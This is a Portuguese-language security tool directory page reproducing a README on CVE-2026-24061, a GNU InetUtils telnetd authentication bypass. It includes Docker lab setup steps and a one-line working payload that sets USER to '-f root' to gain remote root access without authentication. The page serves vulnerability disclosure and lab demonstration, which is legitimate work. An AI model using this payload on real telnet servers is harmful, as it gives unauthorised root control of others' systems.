Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-24061 — Vulnerabilidade no GNU InetUtils telnetd Permite Acesso Root Remoto | Kitploit
Ferramentas/GitHubGitHub/lucaspdiniz/cve-2026-24061
Análise de VulnerabilidadesExploraçãoTestes de PenetraçãoAutenticaçãoFerramenta de Acesso Remoto
GitHublucaspdiniz/cve-2026-24061

CVE-2026-24061

Vulnerabilidade no GNU InetUtils telnetd Permite Acesso Root Remoto

Ver Repositório
há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Bypass de Autenticação no telnetd do GNU InetUtils via Injeção de Argumentos - CVE-2026-24061 📚

Introdução

Uma vulnerabilidade de injeção de argumentos recentemente identificada no telnetd do GNU InetUtils permite que atacantes contornem a autenticação definindo a variável de ambiente USER com o valor “-f root”. Como resultado, um atacante remoto não autenticado pode obter acesso a sistemas que executam o serviço telnetd vulnerável e elevar privilégios para root. Se explorada com sucesso, esta falha pode permitir que atacantes acessem informações sensíveis, alterem configurações do sistema e executem comandos arbitrários, potencialmente resultando em um comprometimento total do sistema.

Detalhe do CVSSCNA (MITRE)
Pontuação Base9.8
VetorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Vetor de AtaqueRede
Complexidade do AtaqueBaixa
Privilégios NecessáriosNenhum
Interação do UsuárioNenhuma
EscopoInalterado
Impacto na ConfidencialidadeAlto
Impacto na IntegridadeAlto
Impacto na DisponibilidadeAlto
Versão do CVSSv33.1

O que aconteceu?

Conseguimos acessar o Commit abaixo de 2015 que mostra a alteração de código (linha 62) que criou esta vulnerabilidade.

O objetivo deste readme é apenas mostrar a execução do exploit, não todos os passos que geraram este CVE, no entanto, a intenção é substituir o placeholder %U pelo valor obtido da variável de ambiente USER. Esta variável de ambiente específica é controlada pelo usuário e pode ser manipulada através do protocolo Telnet 🔥 .

Ambiente 🔓

Para este teste, criei 2 contêineres usando imagens do Docker Hub, com uma versão vulnerável do InetUtils.

  • Contêiner -> https://hub.docker.com/_/ubuntu
root@kitploit:~
docker run --rm -it --name vuln -p 23:23 ubuntu:22.04 bash
      apt update
      apt install build-essential wget tar
      wget http://ftp.gnu.org/gnu/inetutils/inetutils-2.5.tar.gz
      tar -xvzf inetutils-2.5.tar.gz
      cd inetutils-2.5
      ./configure
      ./configure --enable-telnet
      make clean
      make
      make install
      export PATH=$PATH:/usr/local/libexec
      apt install openbsd-inetd
      echo "telnet  stream  tcp  nowait  root  /usr/local/libexec/telnetd  telnetd" >> /etc/inetd.conf
      service openbsd-inetd restart

docker run --rm -it --name attacker ubuntu bash
      apt install telnet

Payload 💀

Com o payload abaixo, substituímos a variável USER e contornamos o sistema de autenticação.

root@kitploit:~
USER="-f root" telnet -a 172.17.0.3

Versões Afetadas ✅

  • O Telnetd no GNU InetUtils até a versão 2.7 permite autenticação remota.
  • Siga a atualização para a versão do Ubuntu. -> https://ubuntu.com/security/CVE-2026-24061

Verifique sua versão do inetutils

root@kitploit:~
hostname --version
telnetd --version


Até a próxima :wink:

Baixar ferramenta